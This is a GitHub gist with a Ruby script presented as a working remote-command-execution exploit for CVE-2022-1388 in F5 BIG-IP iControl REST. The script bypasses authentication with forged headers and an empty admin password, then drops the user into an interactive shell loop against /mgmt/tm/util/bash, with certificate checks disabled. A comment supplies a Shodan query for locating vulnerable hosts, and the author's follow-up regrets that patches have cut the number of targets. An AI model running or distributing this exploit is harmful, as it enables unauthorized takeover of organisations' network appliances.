Skip to content

Instantly share code, notes, and snippets.

@komodoooo
Created September 20, 2022 18:34
Show Gist options
  • Save komodoooo/77aca9410767e6d0063191c0bc7b27e9 to your computer and use it in GitHub Desktop.
Save komodoooo/77aca9410767e6d0063191c0bc7b27e9 to your computer and use it in GitHub Desktop.
CVE-2022-1388 exploit via the "/mgmt/tm/util/bash" endpoint.
require 'http'
require 'openssl'
puts """
CVE-2022-1388
F5 BIG-IP iControl REST RCE exploit
By komodo\n
"""
=begin
Shodan query to search vulnerable targets:
"BIG-IP®-+Redirect"+"Server"
https://www.shodan.io/search?query=%22BIG-IP%26reg%3B-%2BRedirect%22%2B%22Server%22
(sometimes they're flagged as honeypot)
=end
def main(target, command)
headerz = {
"Content-Type" => "application/json",
"Connection"=> "keep-alive, x-F5-Auth-Token",
"X-F5-Auth-Token"=> "a",
"Authorization" => "Basic YWRtaW46"
}
payload = {
"command" => "run",
"utilCmdArgs" => "-c #{command}"
}
target.delete_suffix!("/") unless target[-1..-1] != "/"
url = target += "/mgmt/tm/util/bash"
begin
ctx = OpenSSL::SSL::SSLContext.new()
ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE
sus = HTTP.post(url, :headers=>headerz, :json=>payload, :ssl_context => ctx)
if sus.to_s.include?("commandResult")
puts sus.to_s.gsub(",", ",\n")
else
puts "Bro this is not vulnerable lol"
exit()
end
rescue => e
puts e
end
end
print "Target url: "
target_url = gets.chomp
while true
print "\r> "
main(target_url, gets.chomp)
end
@komodoooo
Copy link
Author

Unfortunately, the results indexed by shodan are far fewer due to the patches adopted by companies.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment